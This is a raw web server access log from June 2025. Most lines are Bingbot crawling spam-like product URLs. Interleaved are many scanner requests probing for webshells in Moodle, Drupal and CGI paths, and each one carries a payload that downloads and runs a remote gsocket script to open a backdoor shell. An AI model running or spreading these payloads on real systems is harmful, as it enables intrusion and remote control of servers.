cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.139 - - [13/Jun/2025:04:41:43 +0000] "GET /Galaxy%20Express%20999%20Limited%20Edition%20Ngauge%20Diecast%20Scale%20Model%20-%20UlZFXlNdRlRQS0dU/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.139 - - [13/Jun/2025:04:41:53 +0000] "GET /%C5%A0TUNNING%2024%20x%2020%20Original%20ART%20BY%20THE%20LISTED%20MASTER%20GARY%20LAURENT%20HAITIAN-HAITI%20-%20UlVFWVRYRVVSS0NX/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.139 - - [13/Jun/2025:04:42:32 +0000] "GET /Brier-Patch%20Philosophy%20by%20Peter%20Rabbit%20-W.Long;%20C.Copeland%201906%20HC%20-%20UFNFW1ReS1VUQkZb/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 69.197.182.50 - - [13/Jun/2025:04:42:51 +0000] "GET /wp-content/install.php HTTP/1.1" 200 16 "https://cashforcarscarrollton.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.51 - - [13/Jun/2025:04:43:41 +0000] "GET /24x16%20Frame%20Black%20Solid%20Wood%20Picture%20Frame%20Width%201.125%20Inches%20%7C%20Interior%20Frame%20D%20-%20UVNFWldYRltWSkJU/ HTTP/1.1" 200 13 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.139 - - [13/Jun/2025:04:46:04 +0000] "GET /REGALICO%20Hard%20Wax%20Beads%20for%20Hair%20Removal%20Wax%20Beads%20for%20Brazilian%20Waxing%20Beans%20-%20UldEWFJbRVpWSkNW/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.139 - - [13/Jun/2025:04:46:47 +0000] "GET /PIC16C63A-20/SO%20Microchip%20Technology%20(2pcs)%20FACTORY%20NEW%20OVER%205K%20IN%20U.S.A.%20STOCK%20-%20UlBCX1VaQFVWQ0FT/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.102 - - [13/Jun/2025:04:47:19 +0000] "GET /Mini%20Wireless%20Hidden%20Spy%20Camera%20Wifi%20IP%20Home%20Security%201080P%20HD%20Night%20Vision%20Cam%20-%20UVhGUF9ZR1FRQ0BW/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.51 - - [13/Jun/2025:04:47:32 +0000] "GET /Sumikko%20Gurashi%20Keikyu%20Collaboration%20Collect%20Stuffed%20Toy%20Polar%20Bear%20-%20UFhGXVBXSlNURENW/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:04:49:07 +0000] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:04:49:47 +0000] "GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.139 - - [13/Jun/2025:04:50:16 +0000] "GET /Ice%20Nine%20Kills%20X%20Terrifier%203%20Slash%20Kill%20Happy%20Halloween%202024%20T-Shirt%20PA1210_18%20-%20UlZFXlRbQ1pYR0FX/ HTTP/1.1" 200 13 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:04:51:18 +0000] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:04:51:44 +0000] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:04:51:52 +0000] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:04:52:54 +0000] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 0 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:04:53:21 +0000] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 45.227.253.15 - - [13/Jun/2025:04:54:09 +0000] "GET /index.php/jk HTTP/1.1" 500 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.4.4 Mobile/15E148 Safari/604.1"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:04:54:21 +0000] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:04:54:41 +0000] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:04:54:43 +0000] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:04:54:44 +0000] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 0 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 108.181.202.211 - - [13/Jun/2025:04:55:11 +0000] "GET /wp-content/install.php HTTP/1.1" 200 16 "https://cashforcarscarrollton.com/wp-content/install.php" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0)"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.193 - - [13/Jun/2025:04:56:42 +0000] "GET /6SL3224-0BE33-0UA0%20SIEMENS%20SINAMICS%20POWER%20MODULE%20240%206SL3224-0BE33-0UA0%20-%20UlZFWlFdS1NSQEdQ/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:04:57:00 +0000] "GET /all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:04:57:51 +0000] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.150 - - [13/Jun/2025:04:58:13 +0000] "GET /Vintage%20Lake%20Okutama%20Chichibu-tama%20National%20Park%20Japan%20Souvenir%20Felt%20Pennant%20-%20UlBGUVFYQ1tZREpT/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.220 - - [13/Jun/2025:04:58:18 +0000] "GET /EBC%20FA409HH%20Double-H%20Sintered%20Motorcycle%20Brake%20Pads%20Fits%20Front%20or%20Rear%20-%20UlJGWlVdQFRXQEBQ/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:04:58:35 +0000] "GET /modules/drupal_rce/drupal_rce/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:04:59:09 +0000] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.220 - - [13/Jun/2025:04:59:27 +0000] "GET /BooTaa%204%20Pack%20Airplane/Flying%20Toys,%2017.5%22%20Large%20Throwing%20Foam%20Plane/Gliders,%202%203%20-%20UFJGXlZdQlZYQUBb/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:00:40 +0000] "GET /modules/ctools-8.x-3.4/ctools/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.193 - - [13/Jun/2025:05:00:54 +0000] "GET /Nintendo%20Joy-Con%20Gray%20Left%20(HACAJLGAA)%20Joystick%20Joycon%20Tested%20-%20UVFHXl9WRlJVS0VS/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:01:42 +0000] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:02:05 +0000] "GET /sites/all/modules/views-7.x-3.24/views/shell.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:03:13 +0000] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.220 - - [13/Jun/2025:05:03:38 +0000] "GET /Haunted%20Mansion%20Entrance%20Gate%20Plaque%20Resin%20Sign%20Disney%20Park%20Attraction%20(6x10)%20-%20UlVFWFBfQFJUSkpT/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:03:52 +0000] "GET /blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:04:28 +0000] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.9 - - [13/Jun/2025:05:04:44 +0000] "GET /Horse%20Stainless%20Steel%20Copper%20Twisted%20Wire%20Mouth%20D-Ring%20Snaffle%20Bit%20-%20UFNFW1ReRVpYQENR/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:04:46 +0000] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.18 - - [13/Jun/2025:05:04:59 +0000] "GET /BEAUTY%20AND%20THE%20BEAST%20BELLE%20PRINCESS%20Birthday%20Party%20Decoration%20BALLOON%20PRINCESS%20-%20UlNHW1FYSlNYQ0BU/ HTTP/1.1" 200 13 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.9 - - [13/Jun/2025:05:05:14 +0000] "GET /Varistor:%20Metalloxid%20560VDC%20420VAC%20680V%201200A%20THT%20%2032J%20B72207S0421K101%20THT%20Vari%20-%20UVJGWFBWR1dQRktR/ HTTP/1.1" 200 13 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:05:38 +0000] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:05:50 +0000] "GET /moodle/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:06:13 +0000] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:07:02 +0000] "GET /aulavirtual/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.9 - - [13/Jun/2025:05:07:14 +0000] "GET /Vintage%20ECHO%20Ecko%20Unltd%20Unlimited%2090&/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:07:24 +0000] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.13 - - [13/Jun/2025:05:07:34 +0000] "GET /Lenovo%20Legion%20Go%208.8%22%20144Hz%20Handheld%20Touch%20Gaming%20PC%20AMD%20Z1%20Extreme%2016GB%20512GB%20-%20UFFGWlVdQVBVQURQ/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.18 - - [13/Jun/2025:05:08:06 +0000] "GET /*NEW%20OEM*%20OMC%20Johnson%20Evinrude%20Bracket%20Bumper%20-%20UVdGWVFdQ1RSRUBa/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:08:07 +0000] "GET /aulavirtual/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.9 - - [13/Jun/2025:05:08:35 +0000] "GET /2022%20Highlander%20Rh%20Pass%20Side%20Front%20Door%20Interior%20Trim%20Panel%20Black/Gray%20Fb10%20-%20UVJGX1ZaRFtWR0BQ/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:08:48 +0000] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 208.110.64.178 - - [13/Jun/2025:05:09:00 +0000] "GET /wp-content/install.php HTTP/1.1" 200 16 "https://cashforcarscarrollton.com/wp-content/install.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.9 - - [13/Jun/2025:05:09:14 +0000] "GET /Poly%20Mailers%20Shipping%20Bag%205x7%206x9%209x12%2010x13%207.5x10.5%2012x15.5%2014.5x19%2019x24%20-%20UlhAXlBWRVNTQkVb/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:09:18 +0000] "GET /campus/blocks/rce/lang/en/block_rce.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:09:38 +0000] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:10:21 +0000] "GET /campus/local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:10:42 +0000] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.200 - - [13/Jun/2025:05:10:54 +0000] "GET /Light:%20On%20The%20South%20Side%20Numero%20Group%20NUM033%20Sealed%20Compilation%20&%20Book%202xLP%20-%20UFNFW1ddRVNZQkpW/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:11:02 +0000] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:11:27 +0000] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 152.42.250.211 - - [13/Jun/2025:05:11:41 +0000] "GET /wp-login.php HTTP/1.1" 500 5 "-" "Mozila/5.0"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:11:53 +0000] "GET /img/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:12:13 +0000] "GET /?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:12:31 +0000] "GET /?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.200 - - [13/Jun/2025:05:12:54 +0000] "GET /Parchment%20Paper%20Sheets,%20Unbleached%20Parchment%20Baking%20Sheets,%20Precut%20Parchment%20Pap%20-%20UlRFXF5bSlpSRkVX/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 52.167.144.18 - - [13/Jun/2025:05:12:59 +0000] "GET /6SIGN%20Custom%20Personalized%20Vinyl%20Banner-Premium%2013oz%20Heavy%20Duty%20Semi-Gloss%20Vinyls%20-%20UVNGXlZXSlNSS0tR/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.51 - - [13/Jun/2025:05:13:08 +0000] "GET /Chinese%20Old%20Song%20White%20Bowl%20/%20W%2016.6%5Bcm%5D%20Qing%20Ming%20Plate%20Bowl%20Pot%20-%20UVRHUVNdRVFTRUJT/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.200 - - [13/Jun/2025:05:13:14 +0000] "GET /Printed%20needlepoint%20Tapestry%20Gobelin%2030x40%20cm%20Gypsy%20Madonna%20Orchidea%20-%20UFdHUFRYRFpYRkNT/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:14:20 +0000] "GET /?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:14:43 +0000] "GET /?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 207.46.13.64 - - [13/Jun/2025:05:14:55 +0000] "GET /Replacement%207L0312%207l0312%20for%20Caterpillar%20-%20UFFGX1FXQltYQEJS/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:14:55 +0000] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 0 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.51 - - [13/Jun/2025:05:14:59 +0000] "GET /Super%20Stabilizers%20For%20Canoe%20-%20Giant%20Pontoons%20Make%20Canoe%20into%20Trimaran!%20-%20UlBFWlJXQFRRR0FT/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:15:12 +0000] "GET /command.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:15:37 +0000] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.55.39.197 - - [13/Jun/2025:05:15:59 +0000] "GET /Metal%20Bowl%20for%20Silicone%20Pipe%20%7C%20Replacement%20%7C%202%20pack%20%7C%20USA%20Seller%20-%20UlJAW1VdQVJXS0tW/ HTTP/1.1" 200 23 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
cashforcarscarrollton.com.infinitibizsol.com:80 157.230.44.159 - - [13/Jun/2025:05:16:24 +0000] "GET /cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
cashforcarscarrollton.com.infinitibizsol.com:443 157.230.44.159 - - [13/Jun/2025:05:16:39 +0000] "GET /command.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 500 5 "-" "python-requests/2.32.3"
